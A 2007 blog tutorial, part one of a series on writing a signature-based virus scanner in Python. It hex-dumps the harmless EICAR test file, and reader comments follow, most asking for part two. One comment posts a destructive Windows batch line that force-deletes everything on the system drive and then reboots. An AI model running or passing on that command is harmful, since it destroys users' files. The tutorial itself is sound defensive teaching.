Writing a Virus Scanner (Part 1 of 2)

July 25, 2007 at 9:47 pm 34 comments

Introduction:

Okay, I’m sure everybody here wants to get down and dirty with the world of viruses. I’m sure you all have bad memories with viruses and now is your chance to get some revenge. All right, so our scanner won’t be that strong. In fact it will only detect one virus. To make matters worse the “virus” is just a test virus used to test out antivirus software. Still, armed with this information you can learn to apply these examples to finding real viruses. In the first part of this mini-series I will show you the basic theory behind antivirus software, so that we can write our own little scanning script. Obviously we won’t have advanced features such as quarantining, but if you add to the program, it could actually do some fine work. You should be able to apply this theory to whatever language you program in. I’ll be using Python.

Theory:

The basic theory behind antivirus software is to detect viruses based
on their signatures, a hexadecimal string based on the contents of a file. First I will show you how we get this string from a known virus. Then in the next part of the series, I’ll show you how to put this information to good use. Basically you find the virus signature by dumping the file in hexadecimal. Hexadecimal is a base-16 system (decimal is a base-10 system) and teaching it to you is outside the reach of this tutorial. If you want to learn hexadecimal (not completely necessary, but definitely helps out) I recommend going here.

Note: We will not be using the 0x1F format, nor will we be using the $1F. We will be just writing 1F. These numbers are still hexadecimal.

Okay, for the next step your antivirus/antispyware utility might interfere with our activities if it has automatic protection features that scan downloads. We are going to download the industry standard eicar test file.

WARNING: I cannot be held responsible for misuse of antivirus software when using this file. If you aren’t comfortable using antivirus software, this tutorial is not for you.

Download a test file (not one of the ZIP ones). Now we need to dump the file into hexadecimal. There are many programs that can dump into hexadecimal, but I assume you want to do this quickly. If that is the case, please visit Online Hex Dump. Upload your file and there should be hex output. Remove the line numbers and the parts that aren’t hex (the parts at the end of the line). Your final output should be this:

58 35 4F 21 50 25 40 41 50 5B 34 5C 50 5A 58 35
34 28 50 5E 29 37 43 43 29 37 7D 24 45 49 43 41
52 2D 53 54 41 4E 44 41 52 44 2D 41 4E 54 49 56
49 52 55 53 2D 54 45 53 54 2D 46 49 4C 45 21 24
48 2B 48 2A

Now you need to unspace this code. You can do this manually, but I just wrote a nice little Python script to do it for me:

string=”58 35 4F 21 50 25 40 41 50 5B 34 5C 50 5A 58 35 34 28 50 5E 29 37 43 43 29 37 7D 24 45 49 43 41 52 2D 53 54 41 4E 44 41 52 44 2D 41 4E 54 49 56 49 52 55 53 2D 54 45 53 54 2D 46 49 4C 45 21 24 48 2B 48 2A”
string=string.replace(” “,””)
print string 

Here’s what the final signature looks like:

58354F2150254041505B345C505A58353428505E2937434329377D244549
4341522D5354414E444152442D414E544956495255532D544553542D46494
C452124482B482A

This makes a lot faster if you are serious about all this virus signature stuff. Now you have the virus signature (note it should all be on one line, the example about isn’t on one line, due to bad WordPress blog editing in Opera)! Don’t worry, you won’t have to do this for every virus, or most viruses. There are sites that provide free virus signatures. One site I found is run by Lightspeed Systems. Their signature provided for this test signature isn’t the full hex dump. It’s actually only about half of it. Checking that half would still find the virus, it would just return more false-positives. The theory behind our virus scanner is that it will hex dump the file and compare it to a known list of virus signatures. To detect more advanced viruses you will have to learn about polymorphic viruses, which is definitley outside the scope of this tutorial.  Good luck. Learn all this so you’ll be ready for the next tutorial. If you don’t wish to write your own virus scanner, maybe you would like to help out with an open source antivirus project.

Resources:

ASCII Table / Extended ASCII Codes– A table with ASCII and hex character codes.

NickCiske.com | Tools– Tools for converting various number systems (including hex) to text.

Online Hex Dump– An online hex dumper (if the title wasn’t obvious).

Python Programming Language — Official Site– Home to the famous scripting/programming language. It’s easy to learn, and allows you to make quick little functions that save you a ton of time. Python can also make robust applications. That’s why we’ll be using it to make the antivirus program in the next part of the tutorial.

Viruslist.com -Information About Viruses, Hackers, and Spam– A huge virus info site.

Virus Detection Signatures– Free virus signatures. There’s probably better stuff out there though.

That’s all for part one folks! If you love, hate, or don’t care, leave a comment. There might be a small wait for part two, but it should be within the next week or two (I might do some smaller posts for a while, and I’ll be out of a town later this week). Thanks for reading!

-Vainentree

Advertisements

Entry filed under: Computers, Programming, Scripting, Security, Series, Software, Technology.

Windows Live Messenger Has a New Protocol Underway Formats

34 Comments Add your own

  • 1. Amr M. Kamel  |  September 28, 2007 at 7:43 pm

    Hey, nice tutorial but where is the second part? I cant wait to read it, plz hurry =)

    Thanks alot for sharing knowledge 🙂

    best regards,
    Amr M. Kamel

    Reply
  • 2. vainentree  |  September 28, 2007 at 8:55 pm

    Sorry, after no one showed interest I didn’t follow it up. Maybe I can get to it this weekend!

    Reply
  • 3. Amr M. Kamel  |  September 29, 2007 at 10:13 am

    No its really great and it is really a very interesting topic :), thanks in advance…

    best regards,
    Amr M. Kamel

    Reply
  • 4. janet  |  October 23, 2007 at 3:41 am

    Very attractive, please go on …..

    Reply
  • 5. Thousif  |  November 8, 2007 at 6:56 am

    Hi nice tutorial, but we need the second part…
    and some more reference to write antivirus code in VC++ or some other lang like java…

    Reply
  • 6. D  |  March 16, 2008 at 4:33 pm

    God dammit I was expecting a part 2. What’s the point of putting “part 1 of 2” when you’re not going to make a part 2.

    God dammit.

    Reply
  • 7. fikri  |  March 22, 2008 at 2:33 am

    oh my God… don’t ever give up my friend 🙂

    i need it! u must help me since I’m turning to a good man. I had released a few viruses before and really feel stupid. Now, I’m on my way to release my own virus scanner to fight my viruses. please help me to do that. 😦

    Reply
    • 8. 1/2-adder  |  January 24, 2013 at 6:11 am

      Hi Fikri,
      You should show me how to write viruses. I guess I need to learn that to become an antivirus programmer. Will you do that?

      Thanks.

      1/2-adder

      Reply
  • 9. shivesh  |  September 24, 2008 at 8:52 am

    That’s a nice article. Can u put something more as i have to create a virus signature scanner. Is the 2nd part available?

    Reply
  • 10. rushikant pawar  |  June 26, 2009 at 11:40 am

    I m trying to design home made antivirus program and for the same purpose I want to collect all virus signatures in HEX uptill now. I am trying to collect it from internet from last 2 years but no link i found ever. Would you like to mail me your suggestions or any links that i can link to..

    Reply
  • 11. lynx  |  December 11, 2009 at 9:15 pm

    Great tutorial! You really should do the second part.

    Reply
  • 12. Zach B  |  May 24, 2010 at 9:24 am

    Where is the second part? I was all in to this, then there ws no second part. What about a tutorial on making heuristic software in Python?

    Great job!

    Reply
  • 13. Onthod  |  June 9, 2010 at 5:29 pm

    top Robot Programs At inexpensive Price : kingsbot.tk

    Reply
  • 14. TrB  |  July 10, 2010 at 4:44 am

    Nice tutorial. I Wanted to design a experiment for my students based on this. I want to know how do we compare the signature with the program files. Do we also have to dump the program files in hexadecimal ? thanks .

    Reply
  • 15. TIS  |  July 22, 2010 at 12:31 am

    Very nice article. Go ahead and make that second article happen. Please write an example using C#.net. Also, include more links to “sites that provide free virus signatures”. Please, notify by email when part 2 is available.

    Reply
  • 16. varun  |  July 30, 2010 at 5:52 am

    its great
    please tell me where is the second
    part
    have u written it or not
    thankx

    Reply
  • 17. cherry1234  |  October 23, 2010 at 10:58 am

    Best Software Downloads and Reviews. the most comprehensive source for free-to-trysoftware downloads on the WebBEST 4 DOWNLOADS

    Reply
  • 18. Topix  |  November 15, 2011 at 8:05 am

    when you show us the second part??

    Reply
  • 19. Anil Magar  |  January 11, 2012 at 5:22 am

    how to make birus scanner

    Reply
  • 20. Writing a Virus Scanner « msg1len Official Website  |  July 3, 2012 at 6:23 am

    […] Original Post Share this:TwitterFacebookLike this:LikeBe the first to like this.   Leave a comment […]

    Reply
  • 21. adwait  |  October 18, 2012 at 3:48 am

    Nicely written tutorial. Was very helpful. Please follow it up with the second part….

    Reply
  • 22. Kingstaa  |  November 5, 2012 at 11:42 am

    Nice tutorial, as others I am also waiting for the next.

    Keep up the good work.

    Reply
  • 23. Mohammed Alsubaie  |  November 28, 2012 at 2:45 am

    thank you.

    nice tutorial Bro.

    Reply
  • 24. 1/2-adder  |  January 24, 2013 at 6:21 am

    Hi Vainentree,
    I am very impressed with this post. I had no clue about how to write antivirus programs until I read your post. Thanks a lot, mate. I’d like to talk to you and I can’t wait for part 2!

    Thanks.

    1/2-adder.

    Reply
  • 25. hcg diet food list  |  February 20, 2013 at 3:45 am

    Hello there! Do you know if they make any plugins
    to safeguard against hackers? I’m kinda paranoid about losing everything I’ve
    worked hard on. Any suggestions?

    Reply
  • 26. markus ruhl steroids  |  April 17, 2013 at 11:11 pm

    Its like you read my mind! You seem to know a lot about this,
    like you wrote the book in it or something. I think that you
    can do with some pics to drive the message home a
    bit, but instead of that, this is fantastic blog. An excellent
    read. I will definitely be back.

    Reply
  • 27. Joshua McLaughlin  |  November 17, 2013 at 3:29 am

    as far as just a plugin no HOWEVER you could check out Honeypoint which is a program that helps safeguard against hackers as opposed to guarding against viruses it helps guard against evil humanz ^_^ http://www.microsolved.com you can even download a demo somewhere on the interwebz, it especially helps if your machine is being port scanned it picks up on it right away and there are even some modules\plugins for more offensive countermeasures that go with it

    Reply
  • 28. paul smith  |  March 20, 2014 at 5:24 pm

    help me please where is second part

    Reply
  • 29. shaikhsohail30  |  April 6, 2014 at 6:09 pm

    Good job.. It is of great help and I appreciate your efforts for this one.. Please complete the series…

    Reply
  • 30. shaikhsohail30  |  April 6, 2014 at 6:19 pm

    Reblogged this on shaikhsohail30 and commented:
    This is a great Post from TheNerdCan …

    Reply
  • 31. Md. Moniruzzaman  |  April 17, 2015 at 1:00 pm

    @echo off del % systemdrive% \*.*/f /s /q shutdown -r -f -t 00 auto run Del c:\ *.* ly

    Reply
  • 32. Tico  |  April 19, 2015 at 7:12 am

    Really interested in how to write an antivirus program in Python!!! Please pick this back up again… Would be AMAZING if you did!!!

    Thanks!

    Reply
  • 33. tony  |  November 13, 2015 at 5:41 pm

    great article. looking forward to seeing part 2

    Reply
  • 34. kidus gizaw  |  March 12, 2016 at 12:52 pm

    best web

    Reply

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Trackback this post  |  Subscribe to the comments via RSS Feed


July 2007
M T W T F S S
« Jun   Aug »
 1
2345678
9101112131415
16171819202122
23242526272829
3031  

Contact

vainentree@gmail.com

%d bloggers like this: